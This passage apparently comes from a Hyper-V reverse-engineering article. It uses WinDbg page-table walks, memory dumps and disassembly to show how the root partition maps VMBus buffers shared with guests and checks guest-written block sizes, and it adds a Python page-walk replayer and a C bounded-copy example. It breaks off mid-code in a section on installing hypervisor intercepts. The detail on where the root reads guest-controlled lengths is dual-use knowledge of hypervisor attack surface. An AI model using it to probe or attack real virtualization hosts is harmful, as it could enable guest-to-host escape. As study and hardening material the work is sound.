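<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The translation !vtop just performed can be replayed by hand from the four table entries it printed. The following Python is an added example (not part of the original article) that walks the four-level x86-64 paging structures over a constructed "physical memory" holding only those entries, handles the not-present and large-page cases, and rebuilds the flag column !pte prints. The position of the CopyOnWrite software bit (bit 9) is an assumption taken from the documented MMPTE_HARDWARE layout; everything else is architectural.</span></div>

```python
"""Replay the four-level x86-64 page walk that !pte / !vtop performed above."""

ENTRY_MASK = 0x000F_FFFF_FFFF_F000        # bits 12..51: next table / page base
PRESENT, WRITE, USER, PWT, PCD, ACCESSED, DIRTY, LARGE, GLOBAL = (1 << b for b in range(9))
COPY_ON_WRITE = 1 << 9                    # Windows software bit (assumed: MMPTE_HARDWARE.CopyOnWrite)
NX = 1 << 63
LEVELS = ("PML4E", "PDPE", "PDE", "PTE")

# Constructed "physical memory": just the four entries the walk touches, copied from the
# !vtop / !pte output on this page (entry physical address -> 64-bit entry value).
PHYS = {
    0x1abd00:    0x0000000000225863,      # PML4E: CR3 0x1ab000   + index 0x1a0 * 8
    0x225028:    0x00000000003B7863,      # PDPE:  pfn 0x225      + index 0x5   * 8
    0x3b7bf8:    0x000000010FB12863,      # PDE:   pfn 0x3b7      + index 0x17f * 8
    0x10fb12198: 0x80000001367BB963,      # PTE:   pfn 0x10fb12   + index 0x33  * 8
}


def read_entry(phys, pa):
    """Read one 8-byte table entry; an address we never dumped reads as 0 (not present)."""
    return phys.get(pa, 0)


def walk(phys, cr3, va):
    """Return (physical address or None, [(level, entry address, entry value), ...])."""
    trace = []
    table = cr3 & ENTRY_MASK
    for level, shift in zip(LEVELS, (39, 30, 21, 12)):
        index = (va >> shift) & 0x1FF          # nine index bits per level
        entry_pa = table + index * 8
        entry = read_entry(phys, entry_pa)
        trace.append((level, entry_pa, entry))
        if not entry & PRESENT:
            return None, trace
        if level in ("PDPE", "PDE") and entry & LARGE:   # 1 GiB / 2 MiB page: stop early
            page_mask = (1 << shift) - 1
            return (entry & ENTRY_MASK & ~page_mask) | (va & page_mask), trace
        table = entry & ENTRY_MASK
    return table | (va & 0xFFF), trace


def pte_flags(entry):
    """Reproduce the 11-character flag column !pte prints: C G L D A N T U/K W/R E V."""
    return "".join((
        "C" if entry & COPY_ON_WRITE else "-",
        "G" if entry & GLOBAL else "-",
        "L" if entry & LARGE else "-",
        "D" if entry & DIRTY else "-",
        "A" if entry & ACCESSED else "-",
        "N" if entry & PCD else "-",          # cache disabled
        "T" if entry & PWT else "-",          # write-through
        "U" if entry & USER else "K",
        "W" if entry & WRITE else "R",
        "-" if entry & NX else "E",           # bit 63 set means no-execute
        "V" if entry & PRESENT else "-",
    ))


def vtop(cr3, va, phys=PHYS):
    """Same answer as `!vtop cr3 va` on the dumped tables: the physical address, or None."""
    return walk(phys, cr3, va)[0]


if __name__ == "__main__":
    cr3, va = 0x1ab000, 0xFFFFD0016FE33000
    pa, trace = walk(PHYS, cr3, va)
    for level, entry_pa, entry in trace:
        print("%-5s at %x contains %016X pfn %x %s"
              % (level, entry_pa, entry, (entry & ENTRY_MASK) >> 12, pte_flags(entry)))
    print("VA %x -> PA %s" % (va, "not present" if pa is None else "%x" % pa))
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Running it prints the same four entry addresses, PFNs and flag strings as the !pte output (the last entry is global, dirty, accessed, kernel, writable, non-executable and valid, hence -G-DA--KW-V) and ends at 1367bb000, the same root physical page that the MDL from the GPADL pointed at. When the root kernel maps a ring buffer page, the virtual address it works with therefore resolves to the page the guest shared.</span></div>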
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you dump this memory area, the guest OS parameters published through Data Exchange are visible as UTF-16 strings, for example the key NetworkAddressIPv4 and its value 10.0.0.3:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dc ffffd0016fe33000 L1000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35b30 0065004e 00770074 0072006f 0041006b N.e.t.w.o.r.k.A.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35b40 00640064 00650072 00730073 00500049 d.d.r.e.s.s.I.P.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35b50 00340076 00000000 00000000 00000000 v.4.............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">…………………………………………………………………………………………………………………</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35d20 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35d30 00300031 0030002e 0030002e 0033002e 1.0...0...0...3.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6fe35d40 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte ffffd001`6fe35b30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VA ffffd0016fe35b30</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F1A8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367BD963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bd </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367bd</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is the PFN of the 3rd page of the converted MDL, i.e. the virtual address maps straight onto a guest page.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the same function, rdx points to a value holding the offset (4448h in this example) from the start of the pages shared with the guest OS at which the data to be read begins:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!PkGetReceiveBuffer+0x4e:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov r8,r10 ; r10d was previously loaded with the offset taken from rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">add r8,qword ptr [rcx+20h] ; [rcx+20h] holds a pointer to one of the guest OS pages, so r8 = page base + offset</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VA ffffd0016ff22448</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F910</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367C0963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1367c0</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> -G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you set a breakpoint on the instruction </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">add r8,qword ptr [rcx+20h]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and step through several iterations, r8 eventually points at data like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @r8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d10 00020006 00000148 00000000 00000000 ....H...........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d20 00000001 00000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">a28</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000003 00050002 ....(........... - block size (a28h), written by the guest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d30 0a140000 00000000 00000515 00000103 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d40 00000004 00000001 00000016 0000001a ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d50</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0076004b 00440050 00740061 004b0061 K.v.P.D.a.t.a.K.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d60 00790065 00000000 00000000 00000000 e.y.............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d70 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21d80 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">………………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f40 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f50 0076004b 00440050 00740061 00560061 K.v.P.D.a.t.a.V.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f60 006c0061 00650075 00000000 00000000 a.l.u.e.........</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffd001`6ff21f70 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!pte ffffd001`6ff21f50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VA ffffd0016ff21f50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PXE at FFFFF6FB7DBEDD00 PPE at FFFFF6FB7DBA0028 PDE at FFFFF6FB74005BF8 PTE at FFFFF6E800B7F908</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">contains 0000000000225863 contains 00000000003B7863 contains 000000010FB12863 contains 80000001367BF963</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pfn 225 ---DA--KWEV pfn 3b7 ---DA--KWEV pfn 10fb12 ---DA--KWEV pfn </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1367bf</span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-G-DA--KW-V</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After PkGetReceiveBuffer returns, PipeTryReadSingle copies the data out of the shared buffer with memmove. The block size (A28h here) is stored in the block itself, i.e. in memory the guest writes; if the value is greater than 4000h the copy is not performed, so a guest cannot make the root side copy more than 4000h bytes. This shows that data exchange between the root OS and the guest OS goes through a shared buffer, and the hypervisor interface is used only to notify the root OS that there is data to read from that buffer. In principle the same exchange could be done by sending a series of messages via winhv!HvPostMessage, but that would degrade performance significantly.</span></div>
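<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Worked example (added here; it is not code from this article or from vmbusr): a root-side bounded copy that mirrors the check described above, run over a constructed shared buffer. Only two facts come from the page: the length lives inside the guest-written block and the copy is refused above 4000h. The header layout (size dword at byte offset 14h, counted as the length of the whole block from its start), the 20h-byte header length, the function names and the run_case harness are assumptions for illustration.</span></div>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical block layout for this example. The page only identifies the
 * size field (0xA28 in the dump, 6th dword of the block, byte offset 0x14);
 * treating it as the length of the whole block from its start is an
 * assumption, not vmbusr's real PipeTryReadSingle structure. */
#define PKT_SIZE_OFFSET 0x14u
#define PKT_HEADER_LEN  0x20u
#define PKT_MAX_SIZE    0x4000u  /* the cap the page observes in PipeTryReadSingle */

enum pipe_read_status {
    PIPE_READ_OK = 0,
    PIPE_READ_SHORT_HEADER,   /* not even a header fits at the offset */
    PIPE_READ_TOO_LARGE,      /* size > 4000h: refused, as vmbusr does */
    PIPE_READ_OUT_OF_BOUNDS,  /* size runs past the shared mapping */
    PIPE_READ_DST_TOO_SMALL   /* caller's buffer cannot hold the block */
};

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Root-side bounded copy of one block out of guest-shared memory.
 * shared/shared_len: the root's mapping of the guest pages (the mapped MDL in
 * the walkthrough); pkt_off: the offset the guest published (4448h above).
 * Everything read from `shared` is guest-controlled and can change under us,
 * so the length is read exactly once, validated, and only then used. */
enum pipe_read_status pipe_try_read_single(const uint8_t *shared, size_t shared_len,
                                           size_t pkt_off, uint8_t *dst, size_t dst_cap,
                                           size_t *copied)
{
    *copied = 0;
    if (pkt_off > shared_len || shared_len - pkt_off < PKT_HEADER_LEN)
        return PIPE_READ_SHORT_HEADER;

    uint32_t size = rd32(shared + pkt_off + PKT_SIZE_OFFSET);  /* single read */

    if (size > PKT_MAX_SIZE)          return PIPE_READ_TOO_LARGE;
    if (size > shared_len - pkt_off)  return PIPE_READ_OUT_OF_BOUNDS;
    if (size > dst_cap)               return PIPE_READ_DST_TOO_SMALL;

    memmove(dst, shared + pkt_off, size);
    *copied = size;
    return PIPE_READ_OK;
}

/* Constructed harness: a shared_len-byte mapping with a header at pkt_off
 * modelled on the dump above, except that the size dword is whatever the
 * "guest" chooses. Returns the status; *copied gets the bytes actually moved. */
enum pipe_read_status run_case(size_t shared_len, size_t pkt_off, uint32_t size,
                               size_t *copied)
{
    static uint8_t shared[0x10000];
    static uint8_t dst[PKT_MAX_SIZE];
    const uint32_t hdr[8] = { 0x00020006, 0x00000148, 0, 0,
                              0x00000001, size, 0x00000003, 0x00050002 };

    *copied = 0;
    if (shared_len > sizeof shared || pkt_off + PKT_HEADER_LEN > sizeof shared)
        return PIPE_READ_SHORT_HEADER;
    memset(shared, 0, sizeof shared);
    for (size_t i = 0; i < 8; i++)
        wr32(shared + pkt_off + 4 * i, hdr[i]);

    return pipe_try_read_single(shared, shared_len, pkt_off, dst, sizeof dst, copied);
}

/* Single-value wrappers around run_case. */
int run_case_status(size_t shared_len, size_t pkt_off, uint32_t size)
{
    size_t n;
    return (int)run_case(shared_len, pkt_off, size, &n);
}

size_t run_case_copied(size_t shared_len, size_t pkt_off, uint32_t size)
{
    size_t n;
    run_case(shared_len, pkt_off, size, &n);
    return n;
}

int main(void)
{
    printf("a28h:  status %d, copied %zx\n", run_case_status(0x8000, 0x1d10, 0xA28),
           run_case_copied(0x8000, 0x1d10, 0xA28));
    printf("5000h: status %d (refused)\n", run_case_status(0x8000, 0x1d10, 0x5000));
    printf("1000h past mapping end: status %d\n", run_case_status(0x2000, 0x1d10, 0x1000));
    return 0;
}
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The point to take away: the length field sits in memory the guest can rewrite at any moment, so the root reads it once, caps it at 4000h, and checks it against both the mapped length and the destination before the memmove. The 4000h cap alone (the check visible in the article) is not sufficient if the block starts near the end of the mapping, which is why the example also bounds the copy by the mapping length.</span></div>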
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2. Using the interception interface</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let us configure the hypervisor to notify the root OS whenever one of the guest OSes executes cpuid with leaf 0x11114444. For this Hyper-V provides the HvInstallIntercept hypercall. The hyperv4 driver has a SetupIntercept function, which enumerates the identifiers of all active child partitions and calls WinHvInstallIntercept for each one:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> SetupIntercept()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_INTERCEPT_DESCRIPTOR</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Descriptor;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
